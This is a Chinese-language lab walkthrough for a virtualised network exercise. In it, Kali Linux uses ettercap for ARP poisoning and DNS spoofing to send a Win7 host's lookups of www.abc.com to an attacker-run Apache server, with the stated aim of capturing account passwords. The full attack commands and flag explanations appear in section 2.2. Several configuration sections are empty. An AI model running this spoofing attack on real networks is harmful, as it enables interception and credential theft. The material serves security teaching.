目的:获取被攻击者的账号密码
使用设备:
ENSP
VM虚拟机
Ensp配置(路由器:AR2220,交换机S5700)
云配置:
Kali | Win7 | Win server 2018 |
192.168.10.10 | 192.168.10.20 | 192.168.20.10 |
网卡VM8 | 网卡VM1 | 网卡VM2 |
Server-Server2配置(DNS服务器):
目的:配置IP、掩码、网关
目的:开启DNS服务,增加域名和IP地址对应的DNS条目
使其他设备可以通过域名进行访问
VM虚拟机配置
kali配置:
Win7配置:
Win server配置:
1.1 然后先搭建Web服务
1.2 配置Web主页,进入到Web服务器的根目录,将Web主页复制到这个目录下
(其余具体配置可参照ARP欺骗实验和IP重定向实验配置)
开始实验
2.1 在Win7上安装火狐浏览器,开始访问web服务
此时访问是成功的(IP或者域名)
2.2 在kali上进行攻击
命令1: vim /etc/ettercap/etter.dns
进入编辑界面最后一行(shift+G)
www.abc.com A 192.168.10.10
注释:www.abc.com(域名)
192.168.10.10(kali IP地址)
目的:将 www.abc.com (此域名)引流到 192.168.10.10(kali IP地址)
命令2:service apache2 start
目的:在kali上开启apaceh服务
验证:浏览器输入IP访问 192.168.10.10(kali的IP地址)
命令3:ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.10.20// /192.168.10.254//
注释:T文本模式怡示
P非混杂模式
-M中间人攻击
remote为双向模式,同时欺骗通信的双方
-P调用dns_spocof插件进行dns欺骗攻击
192.168.10.20为目标主机IP(win7的IP地址)
192.168.10.254为网关的IP地址
以上命令其实是实现了两次欺骗攻击,一次是ARP欺骗,一次是DNS欺骗:
ARP欺骗的目的是将win7的DNS解析请求报文发送到kali
(MAC地址——引流)
DNS欺骗目的是给win7回复错误的DNS解析结果
2.3 在win7 上查看实验结果
命令4:ping www.abc.com
结论:可以看到回复地址为192.168.10.10(kali的IP地址),实验成功,可以在win7上进行域名访问,结果如下图:
注:如果win7使用浏览器通过域名(www.abs.com)访问网页还是没有变化(DNS缓存没有清除),则使用命令:ipconfig /flushdns。
命令:ipconfig /flushdns的作用
ipconfig /flushdns 这是清除DNS缓存用的
来自 <ipconfig /flushdns 清除系统DNS缓存_chenlycly的专栏-CSDN博客_dns flush>